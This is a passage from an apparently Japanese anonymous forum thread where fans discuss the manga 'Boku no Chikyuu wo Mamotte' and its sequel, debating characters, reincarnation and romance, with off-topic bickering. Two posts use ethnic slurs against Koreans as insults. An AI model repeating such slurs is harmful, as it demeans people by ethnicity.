正義感はいいのだけど、人間って一面だけじゃないのに
玉は一方向から見て判断してるだけっぽい発言が多くて。
ビワタリがわざわざそう言う風に設定したんだろうけど。

517 :花と名無しさん:2006/09/17(日) 09:35:03 ID:???0
>人間って一面だけじゃないのに
>玉は一方向から見て判断してるだけっぽい発言が多くて。

↑それって玉だけだっけ?
平たく眺めると、ぼく球は人気キャラ達も大して変わらないと思うけど。
言ってしまえば、作劇的な部分で感情移入の方向を誘導されてるだけ。

518 :花と名無しさん:2006/09/17(日) 13:10:43 ID:cZ8w8zGi0
>>512
日本語でおk

519 :花と名無しさん:2006/09/17(日) 13:19:38 ID:???0
↑おまいさん以外には分かったらしいぞ朝鮮人

520 :花と名無しさん:2006/09/17(日) 14:03:31 ID:???0
男なのに木蓮になってる夢を見た
絶世の美女ということで男にはチヤホヤされまくりでいい気分だった

あれだけいい目にあえるんだから多少の不条理は我慢すべきだな

521 :花と名無しさん:2006/09/17(日) 21:17:08 ID:???0
>>517
それは玉蘭に限った事じゃないけどね。日渡漫画のキャラに共通している事だよ。
一方的ではなく他の方向からも物事を見る事が出来るキャラ、要するに
頭ごなしに自分の意見を押し付けたりしないキャラっていないのか?

522 :花と名無しさん:2006/09/17(日) 22:56:15 ID:+b16Ygku0
>521
>一方的ではなく他の方向からも物事を見る事が出来るキャラ、要するに
 頭ごなしに自分の意見を押し付けたりしないキャラっていないのか?

星野君・・・古っ

523 :花と名無しさん:2006/09/18(月) 00:40:24 ID:???O
後半の一成とかは?
現世キャラでは性格いいほうだったような

524 :花と名無しさん:2006/09/18(月) 00:57:41 ID:???0
木蓮はちやほやされるだろうけど、ありすのがもてそう
どっちかっていったらありすになりたい

525 :花と名無しさん:2006/09/18(月) 01:28:47 ID:???0
>>524
本星の木蓮は特権階級中の特権階級の美女、という設定だからな。
畏れ多すぎて言い寄る男は少なそう。
ありすのほうが、極端な話ちょっと近所のかわいめの女、でしかないわけだから。

526 :花と名無しさん:2006/09/18(月) 04:18:46 ID:???0
>>520
>男にはチヤホヤされまくりでいい気分だった

自分、大して美人じゃないのに今はモテ期というやつらしく、
なんだか知らんけどモテて困る。
本命以外はみんな断ってるからすごく心苦しいよ。
一人を除いて申し分ない人ばかりだから、すごく申し訳ない。
「いい気分」なんて思えない。

527 :花と名無しさん:2006/09/18(月) 04:54:42 ID:???0
>>526
つ人それぞれ

ていうか自分語り?

528 :花と名無しさん:2006/09/18(月) 07:42:12 ID:???O
>>526
ハゲシクワロタ

529 :花と名無しさん:2006/09/18(月) 08:04:44 ID:???0
>>526
つ思い込み

昔知り合いにいたよ。全然もてないのにもてて困るって人。

530 :526:2006/09/18(月) 11:20:25 ID:???0
モテない人の僻みって怖っ
女友達に妬み僻みで陰口叩かれて凹む木蓮の気持ちもよく分かるな〜〜(笑)

531 :花と名無しさん:2006/09/18(月) 12:08:38 ID:???O
いちいち>>529みたいに言う人にはなりたくない。

532 :花と名無しさん:2006/09/18(月) 12:29:05 ID:???0
確かに、自分がもてない人間に限って、他人もそうだと思いたがるな。>>529とは言わないがw
顔が汚らしいのに、性格まで汚らしくなってどうすると。
どのみち漫画にはこれっぽっちも関係ないが。

533 :花と名無しさん:2006/09/18(月) 12:51:50 ID:???0
>>525
同意。ありすは美声の君という設定がなくても
しずかにもててそうだ。
余談になるけど川原泉の漫画で、ありすみたいな容姿の子が
男子に「おとなしくて地味だけど、あの長い髪は悪くない」と
こっそり人気がある描写があったな。

534 :花と名無しさん:2006/09/18(月) 13:20:38 ID:???O
>>532は顔が汚らしいの?
だからって他人までそうだと思わないほうがいいよ
超矛盾してる

535 :花と名無しさん:2006/09/18(月) 13:30:05 ID:???0
>>530
529はどうかと思うが、その発言には引いた。
結局自慢したかっただけか…。

536 :花と名無しさん:2006/09/18(月) 13:50:27 ID:???O
>>526>>530
なんの脈絡もないスレ違いアテクシモテモテ自慢の挙句、その暴言?
荒らすのもいい加減にしたら?
だいたい女なら誰でもモテ期はあるっつのw
自分のこと美人だと書くだけでも痛いのは理解しろ。
あ、安心して、私はあんたよりは確実に美人だから嫉妬じゃないよ。
↑ほら、自分で書くと痛いでしょ?

537 :花と名無しさん:2006/09/18(月) 14:20:27 ID:???0
>>536
藻前はちょっと落ち着け

538 :花と名無しさん:2006/09/18(月) 14:37:53 ID:???O
なにこの流れ。間違ってケショ板に来たかと思った

539 :花と名無しさん:2006/09/18(月) 15:40:25 ID:???O
モテ期自慢大会☆

540 :花と名無しさん:2006/09/18(月) 16:02:14 ID:2zDv72ZF0
>>519
と、チョンが申しております^^^^^^;;;;;;;;

541 :花と名無しさん:2006/09/18(月) 16:02:25 ID:???0
エンジュもありすも、華はないがわりと美人で男受けする長髪清楚な容姿で
おとなしめの性格も似てるのにモテ度に凄まじい差があるのは
なんだかんだいってもモクレンの生まれ変わりだから?
連載中も男キャラがみんなあの性格の
モクレンの虜っていうのが不自然だなと思ってた。

542 :花と名無しさん:2006/09/18(月) 16:23:28 ID:???0
なんとなく、エンジュは男性に対して無意識にバリヤ張ってる気がした。
男性に対して先入観無さそうなモクレンの方が近寄り易いのではないかな、

と、勝手に予想してみる。


543 :花と名無しさん:2006/09/18(月) 16:37:22 ID:???0
エンジュは玉蘭一筋で、他の男には目もくれないって感じだからね。
玉蘭と出会う前もそんな感じだったのなら、確かに近寄りがたいかも。
実際木蓮は紫苑に惹かれつつも玉蘭も気になるって状態だったから、
他の男も自分にもつけいるスキがあるって思ってたかも。

544 :花と名無しさん:2006/09/18(月) 17:26:42 ID:???0
アリスも身近に木蓮のような女神のような超能力を持つ
絶世の美女がいたら、今ほどのモテ度は無かったんじゃない?
まぁ、ジンパチや輪とかは前世絡みでアリスを好いてただろうけど。

多分、前世でも木蓮がいなければ基地内ではエンジュがモテていたと思う。
(といってもシュスランとエンジュしかいないがw)

545 :花と名無しさん:2006/09/18(月) 17:37:25 ID:???0
基地内のモクレンはモテてたってより野郎共の
マドンナ(死語)的扱いだったんじゃないか?
触れるのも畏れ多い存在として距離を置いてたっつーか。

でも当のモクレンは皆に友好的。自分を特別な存在と思ってないし、
思いたくないから。
そんな微妙なすれ違いにエンジュが真っ先に気付いて、
「何この人!自分と同じ『女』のくせにこんなに特別視されるなんて!!」
って嫉妬で内心炎上したんじゃないか?

546 :花と名無しさん:2006/09/18(月) 17:38:40 ID:???0
シュスランは顔が美人かどうか以前にキツそうな雰囲気で、
性格も実際毒舌でキツイからなあ。
本人の好き嫌いも激しいから、少なくとも男にモテるタイプではないよね。

いくら最終的には別れてしまったとはいえ、一度は結婚の約束までしてた
シュスランの元カレがどんな人だったのか、非常に気になるw

547 :花と名無しさん:2006/09/18(月) 18:34:53 ID:???O
私はシュスランにモクレンが泥水ぶっかけるシーン見たかったな〜。
シュスランは転生して丸くなったよね。



548 :花と名無しさん:2006/09/18(月) 18:35:55 ID:???0
いかにも「いい人」タイプで、シュスランは次第にその点に不満を感じて
別れてしまったんじゃないかな。もちろん元カレの妻は大人しく優しいタイプでね。

>>523
迅八に振られた事で人間的に成長したのかな>一聖

うてなの゜夜子も頭ごなしに自分の意思を通すタイプじゃないな。
むしろ周りの人の事を考えすぎて可哀想に見えたよ。




549 :花と名無しさん:2006/09/18(月) 18:48:24 ID:???O
>>545
エンジュはそこまで醜い感情は無かったのでは。


モクレンはアイドルみたいなもんで汚しちゃいけない感じ?
読者はモクレンの内面ウザくなる程知ってるケド
基地の人は深い付き合いもしてないみたいだし、
モクレン自身仲良くはしていきたいがもう自分を知ってもらうことに関して
諦めてたのでは?てのが自分的解釈で
だからこそ基地内でのある種のモクレンマンセーが起こり得たキガスル…ような?
長文でダラダラ自分語りごめんなさい。

550 :花と名無しさん:2006/09/18(月) 19:10:33 ID:???0
エンジュが木蓮の陰になってモテなかったぶん、
一成がモテるんじゃないか?
妹とか男とかに。

551 :花と名無しさん:2006/09/18(月) 20:06:11 ID:???0
しかしシュスランはよっぽど木蓮嫌いだったんだろうな。
アリスとも初対面じゃいい感じだったのに、木蓮だと
分かってからは「植物の気持ちが分かる」という発言を
あざ笑ってたし、てのひら返しに驚いた。
前世の記憶を持っていると自称してるだけに、あそこで
アリスをプゲラしてたのはやっぱり木蓮嫌いなせいもありそう

552 :551:2006/09/18(月) 20:12:52 ID:???0
前世の記憶を持っていると自称してるだけに、あそこで
アリスをプゲラしてたのはやっぱり木蓮嫌いなせいもありそう


自分だって前世の記憶があると言ってるだけに、
あそこでアリスの発言をプゲラするのも妙な感じがしたけど、
木蓮が嫌いということを考えれば納得もいくって事です。
分かりにくくて申し訳ない。

553 :花と名無しさん:2006/09/18(月) 20:43:34 ID:???0
>>551
桜がありすの植物の気持ちが分かる発言をプゲラしてたのは、
あの時点では「ありす=木蓮」に疑いを持ってたからじゃないっけ?
「木蓮の生まれ変わりでもない普通の地球人がそんな能力持ってるわけないじゃん」って事で。
木蓮のその能力には散々泣かされて来たから、嫌いは嫌いだろうけどね。

ただ、そうなると桜はありすが木蓮の生まれ変わりだろうがそうでなかろうが、
好きではないって事になるんだよね。
初期の一成のウジウジにも優しく付き合ってたのだから、
ありすのそういう所が気に入らないってわけでもなさそうなのだけど。

554 :花と名無しさん:2006/09/18(月) 21:21:40 ID:???0
実は繻子蘭の元カレがそういうタイプだったから、ウジウジしていた頃の一成とも
うまく付き合えたんじゃないのかなとも思うな。

555 :花と名無しさん:2006/09/18(月) 21:33:56 ID:???0
桜はありすが嫌いとか悪気があって笑ったわけではなくああいう
あっけらかんとした性格なだけでは?

一成が女だったらモクレン並みの美少女になってて
ありすにみんなもってかれることもなかったかもと思うと
エンジュって報われないなーと思う。
桜と結ばれたのも良かったのかどうかわからないような描かれ方だし。


556 :花と名無しさん:2006/09/18(月) 21:42:52 ID:???0
確かにもしエンジュが女として転生していたら、男でも
かなりの美少年らしいし、きっと物凄い美少女になったんだろうな。
そうすれば今度こそ玉蘭と結ばれていたのかと思うとカワイソス

でも現世の男メンバーの中では前世が紫苑と仲良しのエンジュだった
こともあって、一番酷い目にあわずにも済んでるし、前世の想い人が
親友で、前世の親友が恋人とかなり恵まれた状態のような気がしないでもない

557 :花と名無しさん:2006/09/18(月) 21:43:25 ID:???0
シュスランの元カレは冷めたから他の女性と結婚したというより、
ずっと連絡しこないシュスランが5年も自分を待っててくれる訳ない、
でも自分から確認するのは怖い、だったら安全な逃げ道を確保してから
別れようというズルさと弱さからかもしれない。

シュスランも薄々それに気づいてて、
自分にもあったその弱さが災いして愛を勝ち取れなかったのを反省し、
転生した桜は前世で同性の親友だったとかを気にせずに、
一成に積極的にアタックしたのかも。

558 :花と名無しさん:2006/09/18(月) 23:13:36 ID:???0
エンジュが木蓮を嫌いだったのは嫉妬から?

559 :花と名無しさん:2006/09/18(月) 23:27:38 ID:???O
>>557
言われてみれば、シュスランと元彼、そのへんの弱さが似てる。
だから現世では恋愛面でも強さを(エンジュの『追いかけてゆく強さ』)出したんだ。
なるほど。
芯が強いエンジュのことを、同性のときから尊敬&大好きだったのでしょうね。

560 :花と名無しさん:2006/09/19(火) 00:26:24 ID:???0
エンジュの髪型にも憧れて同じにしてたくらいだもんね。
美形に転生した親友に惚れる要素はもともとあったということか。
モクレンて本人も言ってたけど、キチェとあの女神様的ルックスがなかったら
モテなかったろうし、性格も男勝りで意外とシュスランみたいなタイプかも。
ありすとは覚醒後も全く似ていないようなのが違和感ある。

561 :花と名無しさん:2006/09/19(火) 01:01:21 ID:???0
>>555
私には桜が木蓮の発言を笑ったのは悪意があったようにみえたな
一成のために「絶対仲間に入れないようにしよう」
と桜から理由を聞いた時から思ってたと思う

562 :花と名無しさん:2006/09/19(火) 01:28:07 ID:???O
桜のあの「つん!」の態度は、相手が木蓮かどうかまだワカンネっていうの以上に、
エンジュが恋したギョクを結果的に手玉に取りやがった木蓮を嫌いだったからよね。
迅八がムキになってありすをかばうから、尚更むかつく。
迅八も気がきかない男だね。

563 :花と名無しさん:2006/09/19(火) 03:16:53 ID:???0
最初にトイレで出会った時は友達になれるフラグ立ちまくりだったのに、
唯一の現世での女仲間にも関わらず、二人が会話したのって最初の会合の時だけのようなw

564 :花と名無しさん:2006/09/19(火) 06:49:38 ID:???0
いくら近所に住んでないとはいえ東京と横浜なんだから、
時々連絡したり女二人で買い物に行ったりしてもおかしくないのにね。
現に一成と桜は時々二人で会ってたのだし。
そもそもありすって誰かと二人だけで会うのって、輪と春とのデートくらい?
本当に同性との深い付き合いって苦手なんだな。

565 :花と名無しさん:2006/09/19(火) 07:01:10 ID:???0
>>562
そっか、桜にしてみたらありすが木蓮かどうかより、
前世が玉である迅八の想い人だからって事で嫌いになる要素は充分なんだ。
そしてありすもありすで木蓮の時同様、迅八に対しては煮え切らない態度だったしなあ。
そしていくら前世が紫苑だと聞かされてたからって、春にも微妙だしもちろん輪に対しても。
こう考えるとありすの方が木蓮よりタチ悪かったりしてw

会合の時しか会ってないし、一成もありすを悪く言うような事はしないだろうから、
桜がこの複雑な関係をどこまで具体的に把握してたのかは謎だけど。
そして一成が吹っ切れて自分と恋愛してくれるようになった頃には、
今さらありすとベタベタ仲良くするのも変な状態になってしまったと。

566 :花と名無しさん:2006/09/19(火) 09:48:43 ID:???0
ありすが紫苑似の春を「少し好みかなぁ?」と言って、
輪が「こんなガキじゃやだ。還りたい昔に」って泣くシーンがあるけど。
あの時は前世で木蓮と婚約してた事と、
秋の陰謀で転生が遅くなった事しか思い出してなかったのかな?
木蓮の本命が玉だと思い込んでた記憶まであるのなら、
「ありすと同じ歳で生まれてたら何も問題なかった」という発想にはならないと思うのだけど。

それとも例え木蓮の本命が玉でも、自分の顔が好みだったとか
最初は自分も意識してくれてた事(シュスランの会話も聞いてたし)を踏まえて、
少なくとも歳が離れすぎて恋愛対象にもなってない現状よりははるかにマシだから?

567 :花と名無しさん:2006/09/19(火) 10:39:11 ID:???0
1)過去と現実の、自分と春の姿が逆転してることが悔しくて堪らない
2)ありすと同じ年で生まれていればありすを(恋愛対象として)振り向かせることができた

こんなところかな・・・。
玉とありすのことは眼中になかった=そこまで覚醒してなかったということなのかもしんない。
前世での木蓮への気持ちや裏切った秋への憎しみが、玉のことより強かったんだろうね。
前世ものの本では、そういった強い気持ちがもっとも顕著に、早期によみがえるそうだから。
(大抵は夢の中のこととして)

568 :花と名無しさん:2006/09/19(火) 12:42:10 ID:???0
それにしてもアリスって外見といい控えめな性格といい
エンジュそっくりなんだが、木蓮が心のどこかで
「来世は女友達もいつつ、シオンとも仲の良かったエンジュになりたい」
と思っていたのかもしらんね

569 :花と名無しさん:2006/09/19(火) 13:37:13 ID:???0
そっくりというほどでもないぞ。あまり空気嫁ない部分は元の木蓮のままだし。
そもそも木蓮がエンジュに対してどういう感情を抱いていたのかいまいちわからない。

570 :花と名無しさん:2006/09/19(火) 14:07:05 ID:???0
でも桜が初めて会った時にアリスをエンジュの
生まれ変わりと勘違いしてたから、あの大人しくて
女らしい雰囲気とかはエンジュと近いと思う

571 :花と名無しさん:2006/09/19(火) 15:48:15 ID:???0
まあ生まれ変わりといっても完全に転生前の性格が100%反映するかっていうと
生まれ育った環境や遺伝子に組み込まれたメモリーによって独自性が生まれてくるから
まったく同じ性格ってのはありえないと思うんだが

572 :花と名無しさん:2006/09/19(火) 16:36:07 ID:???0
実際、玉にしても転生前と後だと微妙に性格が違ってるように思えるし。
秋なんてほぼ別人。彼の場合は死ぬ直前の体験が大きく作用しているんだろうが。

573 :花と名無しさん:2006/09/19(火) 17:37:59 ID:???0
同じ性格なんて誰も言ってないでしょ
単純にアリスは前世メンバーでは木蓮よりエンジュに近い雰囲気だなというだけで

574 :花と名無しさん:2006/09/19(火) 17:38:31 ID:???0
宇宙飛行士など、少人数で閉鎖的なところで行われるミッションは
優秀なだけでなく、誰とでもやっていけるような柔和な人が選ばれるから
紫苑や逆境に弱い繻子蘭が選ばれるのはありえない。
月派遣は左遷ぐらいの意味なのかしら。


575 :花と名無しさん:2006/09/19(火) 17:47:52 ID:???0
アリスとエンジュを一緒にしないで欲しい。エンジュに失礼。
アリスは男をとっかえひっかえする辺り木蓮と全く同じだし、
大人しいようで輪をマンションから突き落としたり、やることえげつないよ。
もしエンジュならそんなことはしないし、輪を突き落とさずに
真っ先に抱きしめて助けてあげるくらいの器量もあったでしょ

576 :花と名無しさん:2006/09/19(火) 17:47:54 ID:???0
みんな忘れてるのかもしれないが奴らは地球人じゃなくて親指サイズ異星人ですよ
こっちの概念なんぞ通用しません

577 :花と名無しさん:2006/09/19(火) 17:51:39 ID:???0
もしウイルスが出る前に地球に降りてたら、
サイズは親指だから地球人にとっちゃ妖精みたいなもんか。
その場合、木蓮&紫苑 エンジュ&玉蘭 は親指メンバー内で
結婚出来る相手がいる可能性大だが、シュスラン、柊、秋はピンチだなw
シュスランは女1人ということで、あぶれはしなさそうだけど
最低でも柊か秋のどちらかが永遠の独身になりそう

578 :花と名無しさん:2006/09/19(火) 18:04:08 ID:???0
秋の方がイケメンなこともあって柊と秋のどちらか選ぶなら
シュスランは秋を選ぶ気が…
二人とも永遠に木蓮を愛し続けるという展開なら独身3人だがw

579 :花と名無しさん:2006/09/19(火) 18:24:51 ID:???0
でも子孫を残す事が第一目的なら、カップル二組だけってかなりキツイよね。
仮に近親婚が禁止されてない種族だとしても、すぐ滅びそうだ。
色んな遺伝子を残した方がいいという考えも含め、
腹違い・種違いでも構わないからとにかくたくさん子作りし、
愛や恋がどうこう言ってる場合じゃないかも。

580 :花と名無しさん:2006/09/19(火) 18:34:55 ID:???0
>>575
エンジュが相手なら元から輪はちょっかい出さんでしょw

581 :花と名無しさん:2006/09/19(火) 19:13:19 ID:???0
アリスのムカツクところ
・綾子先生に懐く輪に焼餅妬いたり、迅八にハッキリNOと言わずに
 期待を持たせたり、外見で春にふらつくという男遊びの激しさ
・球根を落とされたからといって危険な場所にいる輪を叩いて落とす
・輪が瀕死で輪パパママが嘆いているのに迅八と一成のフォモを
 妄想してしまふ☆と不謹慎なことを考えている
・辛い状況の春や輪やミクロなどなど、他人のことを気遣うよりも
 常に「あたし怖い」「あたし愛されてなかったもん」と自己中な発言
・自分に良くしてくれる学校での女友達を見て
 「あのテンションついていけない…」と内心でげんなりしている


582 :花と名無しさん:2006/09/19(火) 19:17:22 ID:???0
木蓮のムカツクところ
・紫苑に目をつけていた癖に、玉にフラついたり他メンバーにも
 愛想を振りまくという男遊びの激しさ
・転生して会いたいからといって孤独な場所にいる紫苑に9年の地獄を与えた
・エンジュが玉を想っていることを知っているくせに、玉をキープ扱い
・友達できないとウジウジ言いながら、「モードしか親友作らない」発言
・自分勝手な行動でモードに大迷惑
・恵まれた環境であるくせにキチェをいらねwと多くの人の気持ちを裏切ろうとする身勝手さ
・歌うと大迷惑って分かっているくせに落ち込んでは歌うことを繰り返す自己中
・わざと裸を紫苑と玉に見せて落とそうとした

583 :花と名無しさん:2006/09/19(火) 20:08:48 ID:???O
>>581>>582 でたーー!!

584 :花と名無しさん:2006/09/19(火) 20:19:37 ID:???0
紫苑のムカツクところ
・自分が生きるために人を殺した
・キャーに対して失礼なことを言ってキャーをムカっとさせた
・幸せな玉を妬み、ことあるごとにジャマをした
・ココに対してヤり逃げするという酷い扱いをした
・「俺のことなんて誰にも分からないもん」と中2病で周囲に大迷惑
・木蓮をレイプ
・キャージュニアに寂しい思いをさせてストレスをためさせた
・玉に粘着して構ってちゃん攻撃
・木蓮への一方的な言葉の暴力
・秋に玉の悪口を言うなど、女々しくて陰険
・ハッキリと言葉にしなかったばかりに木蓮へ深いトラウマを残した

585 :花と名無しさん:2006/09/19(火) 20:22:22 ID:???0
どうせなら全部のキャラでやって欲しいところだ。
同じキャラばっかで芸がないなー。
エンジュとかシュスランは褒めちぎるのかなw

586 :花と名無しさん:2006/09/19(火) 20:24:54 ID:???0
輪のムカつくところ
・アリスの口に噛んだあとのガムを入れた
・球根を落とした
・アリスに不当な婚約を迫った
・タカシを脅迫して心に深い傷を負わせた
・前世での因縁で春を痛めつけた
・ミクロ、春、田村を暴力で痛めつけた
・優しくしてくれた森先生を裏切った
・大介の弟を溺死させようとして、大介には言葉の暴力
・迅八と一成を集団リンチするよう不良をしかけた
・ガセネタを流して田村が逮捕された
・間島と田村の終わった因縁を利用した
・こいつのせいでお寺炎上
・母親に辛い思いをさせた
・近所の子供を騙して利用した
・綾子先生を人質にしようとしていた
・屋上のフェンスをめちゃくちゃに捻じ曲げた
・壁に穴を開けた
・病院の窓を割った
・アリスの服をビリビリにした
・アリスに断りなくいきなりキスをした

587 :花と名無しさん:2006/09/19(火) 20:28:34 ID:???0
シュスランのムカツクところ
・木蓮へ聞こえるような嫌味、陰口
・紫苑に初対面で「性格悪そう」と言った
・エンジュを第一優先し、常に木蓮を敵として憎んでいた
・草を刈る以外は役立たず
・キーワードにエンジュのお守りはもうごめんと陰口を入れていた
・エンジュに玉は小心者だとか悪口ばかり
・ホームシックの時は木蓮を利用したくせに、それを忘れて木蓮の能力を憎む
・木蓮をお酒に誘うふりをして仲間にいれない意地の悪さ

588 :花と名無しさん:2006/09/19(火) 20:30:44 ID:???0
まあストーリー展開の為とは言え、木蓮の単なる落ち込み解消の為だけに歌って、
基地のメンバーに迷惑かけまくる設定はどうにかならないのかとは思ったな。
全体の仕事にも差し支えるだろうし。
地球よりも遥かに文明が進んでる星なら、
似たような環境で数週間シュミレーションすればいいのに。
それともそんな試験でふるい落としたら定員に満たないから、
多少不適格でも強引に送り出した?
一回送ってしまえば、どんなトラブルが発生しようと
期間が過ぎるまで交替も不可能だろうし。

強引に決められた紫苑や、地球が好きでどうしても行きたかった木蓮(秋も?)、
理由が不明の柊を除いた三人(エンジュは玉が行かなきゃ当然行かなかったって事で)は、
気軽な気持ちで参加したのをさぞかし後悔したんだろうなw

589 :花と名無しさん:2006/09/19(火) 20:31:38 ID:???0
桜のムカツクところ
・自称「前世の記憶を持つシア星人の生まれ変わり」のくせに
 アリスの能力をプゲラッチョw
・木蓮なら男でもOKと言った迅八を急に殴りつけた
・田村と春の人工呼吸にハァハァしている変態のくせに、
 迅八へ想いを寄せる一成に対して変態呼ばわり
・その気じゃない一成をレイプして手玉に取った
・口が悪い、性格も悪い
・アリスが木蓮と分かってからはテノヒラを返した
・前世と同じで役立たず

590 :花と名無しさん:2006/09/19(火) 20:34:53 ID:???0
一成のムカツクところ
・いきなり迅八にキスをした変態
・どぉして男ってピーされるとピーなんだろ〜〜と関係を持った責任を桜に押し付ける言い草
・迅八が悩んでいるとビンタをして「ウダウダ言うな!悪いのは相談して僕ら」と唐突な説教
・紫苑に優しくされていたことから、やけに紫苑の肩を持つ
・前世も現世も役立たず


591 :花と名無しさん:2006/09/19(火) 20:38:13 ID:???0
こじつけがすごすぎてつっこめないよ…。

592 :花と名無しさん:2006/09/19(火) 20:45:06 ID:???0
>>590
>紫苑に優しくされていたことから、やけに紫苑の肩を持つ

これは当たり前といえば当たり前だけどね。

593 :花と名無しさん:2006/09/19(火) 20:52:58 ID:???0
迅八のいいところ
・輪本人以外は責めなかった春の過去の悪行を責め立てた
・クラスでハブられていたアリスを助けてあげた
・輪の運動会を撮影してあげた
・自分に惚れていた一成を傷つけずに対応した
・あくまでアリスの気持ちを優先でアリスに気持ちを告げた
・やたらと一成やアリスが肩を持つ輪にマトモに説教した
・サーチェスで不良からアリスを助けた
・サーチェスで身を犠牲にして輪まで助けてあげた


594 :花と名無しさん:2006/09/19(火) 20:53:37 ID:???0
大介のいいところ
・優しそう
・多分弟想い





595 :花と名無しさん:2006/09/19(火) 20:55:38 ID:???0
ちょw
大介のいいとこもちゃんと書いてやってくれw

596 :花と名無しさん:2006/09/19(火) 21:06:42 ID:???O
バルスwww
途中で止めんな

597 :花と名無しさん:2006/09/19(火) 21:07:37 ID:???0
大介は前世も現世も出番少なかったからね…w

598 :花と名無しさん:2006/09/19(火) 21:17:04 ID:???0
壷での下手な自演とナリとほのめかしとストーキング行為が好きな男とだけは
結婚してはいけないと思いましたw

599 :花と名無しさん:2006/09/19(火) 21:18:16 ID:???0
>>598
日本語でおk

600 :花と名無しさん:2006/09/19(火) 21:22:47 ID:???0
・草を刈る以外は役立たず
って面白い!

601 :花と名無しさん:2006/09/19(火) 21:45:38 ID:???0
主役一家はいいかげん食傷ぎみなんで、出番が少なかったキャラ視点の
話を見てみたいんだけど。
作者は思い入れなさそうだし無理だよね。

602 :花と名無しさん:2006/09/19(火) 21:47:27 ID:???O
>>575の意見には目からウロコだ。
確かにそれは言える。
普通子供をベランダからはたき落とさないよね。
優しいエンジュがシオンと、そんでギョクはモクレンとくっつけば、誤解の少ない円満カップルになれたんじゃ?

603 :花と名無しさん:2006/09/19(火) 21:47:54 ID:???0
そこで記憶鮮明。

2巻だけ手に入ったんだけど、ミクロが母親を恋愛対象として
見ていたという設定にドン引きしてしまった

604 :花と名無しさん:2006/09/19(火) 21:56:17 ID:???0
>>602
アリスがいつ男をとっかえひっかえした?
確かに普通は植物よりまず子供をベランダの手すりからおろすこと優先だが

605 :花と名無しさん:2006/09/19(火) 21:57:22 ID:???0
揚げ足取るなよ
どう見ても>>602>>575の「ベランダに子供がいたら〜」の部分への共感だろw

606 :花と名無しさん:2006/09/19(火) 22:02:41 ID:???0
>>605
>>604は単にレス番間違えただけでは。

607 :605:2006/09/19(火) 22:04:31 ID:???0
あ、そうならスマン

608 :花と名無しさん:2006/09/19(火) 22:14:57 ID:???0
どうでもいいけどまたメンヘルが来てたんだね…
気持ち悪い長文で読む気しない。目が滑るよ。

609 :花と名無しさん:2006/09/19(火) 22:16:07 ID:???0
メンヘルっていうかアンチを装ったネタだろw

610 :花と名無しさん:2006/09/19(火) 22:16:55 ID:???0
>>598
誤爆、でいいのかな?

611 :花と名無しさん:2006/09/19(火) 22:29:35 ID:???0
月基地要員は団体行動が取れなければならないという点では
木蓮なんか即落とされてるだろう・・・
バックつきでゴリ押しだったのか。

612 :花と名無しさん:2006/09/19(火) 22:41:20 ID:???0
長老がバックに付いていれば逆らいにくいだろう。

613 :花と名無しさん:2006/09/19(火) 22:44:49 ID:???0
>>611
おばあちゃんが予見してたことから、どういう理由はあれ月へは行っていたんだろう。
本星を遠く離れた辺境の基地での長期勤務ということで、彼らの心のよりどころとなりうるキチェスが
必要とされただけかもしれない。

614 :花と名無しさん:2006/09/19(火) 23:02:56 ID:???O
>>603
だよね〜
自分が出てきた穴じゃん…
悪いけどきんもーっ☆だよ
(オゲフィン発言失礼)

615 :花と名無しさん:2006/09/19(火) 23:34:04 ID:???0
>>613
過去の基地メンバーにもキチェ信者がいたみたいだしね。
まあ確かに故郷の映像を見せたりして心のよりどころにもなってたかもしれないが、
その反面ドロドロの愛憎劇を繰り広げてもしまったね。
せめて木蓮があんなに美人でナイスバディでなかったら、
もっと平和だったかもしれないね。

616 :花と名無しさん:2006/09/20(水) 00:44:55 ID:???0
>>614
二巻しか見てないから分からないんだけど、
まさか一巻でミクロが母親を恋愛対象として
見てしまうキッカケとかが描かれてたのかな?

ぼくの地球を守ってしか見たことなかっただけに、
あのミクロがあの母親にそういう気持ちを抱いてたことにビビった
いくら血が繋がってないとはいえ、なぁ・・・

617 :花と名無しさん:2006/09/20(水) 01:43:33 ID:???O
親指サイズか…
彼らが必死こいて刈った草も地球人は一刈きでいいのか……

618 :花と名無しさん:2006/09/20(水) 02:09:42 ID:???0
>>615
愛憎劇になってしまったのは、木蓮の容姿云々というよりも、
母星の壊滅という異常事態によって、閉鎖環境での先の見えない集団生活、という状況に陥ったためと思われる。
本来、それほど長期勤務ではなかっただろうし、
ああいう状況に置かれたら、極端な話木蓮が不細工であっても愛憎劇に発展しかねない。
男女の数がアンバランスであり、かつ互いに複雑な好悪の念を抱いている以上はね。

619 :花と名無しさん:2006/09/20(水) 02:47:50 ID:???0
>>617
除草ロボットってのも、地球での草刈り機程度の働きなんだろうね。
まさか基地中に植物がはびこる事態なんて誰も想像出来なかったろうし。
っていうか、木蓮が自分で予想して事前に対策練れよとも思うがw

ちなみに月に行く前の木蓮は、大学などの外で辛い事があった時は
楽園に戻るまで歌うのを我慢してたのだろうか?
そして辛い時に歌うってのはキチェス共通の特性なのか、木蓮だけなのかも気になる。

620 :花と名無しさん:2006/09/20(水) 10:07:56 ID:???0
>>609
ネタでもここまで熱心だとビョーキですよ

621 :花と名無しさん:2006/09/20(水) 16:09:58 ID:???O
>>620
もうビョーキだと思う。

622 :花と名無しさん:2006/09/20(水) 16:44:19 ID:???0
発病したんですね。

623 :花と名無しさん:2006/09/20(水) 20:19:16 ID:???0
ええ、とうとう発病したんだわ・・・

624 :花と名無しさん:2006/09/20(水) 20:20:13 ID:???0
せっかくワクテカをうってもらったのに・・・

625 :花と名無しさん:2006/09/20(水) 21:06:46 ID:???0
>>619
さすがに月に行く前は外では我慢していたんじゃないのかな。
でないと大学や外がジャングル状態になってしまって除草ロボットを
総動員させなくてはいけなくなるよ。

626 :619:2006/09/20(水) 21:48:54 ID:???0
自己レスになっちゃうけど、木蓮と木蓮両親以外のキチェスって、
自分がキチェスである事を悩んだりとかしてなさそう。

一生結婚出来ず純潔を守らなければならない事に関しても、
キチェスである事にいい意味でも悪い意味でもプライドを持っていれば、
好き好んで一般人と一緒になって苦労しなくても…って感じ。
キチェスの男性が短命ってのも、キチェス同士のカポーを作らせない為の設定だろうし。

627 :花と名無しさん:2006/09/20(水) 22:36:53 ID:???0
>>626
まあ悩ませないための純粋培養だし。
言い方を変えれば、元々キチェスには「自らはなぜキチェスなのか」「自分にはキチェス以外の人生があるのか」
そういった疑問を抱くことを許されない、極端に言えば現代の王族皇族なみに縛られた生き方だと言える。
もちろんその代償として彼らには深い社会からの敬意と恵まれた待遇が与えられていたんだろうけど。

628 :花と名無しさん:2006/09/21(木) 00:04:08 ID:???O
モクレンはモクレン父の友人とやらに会えたのだろうか?
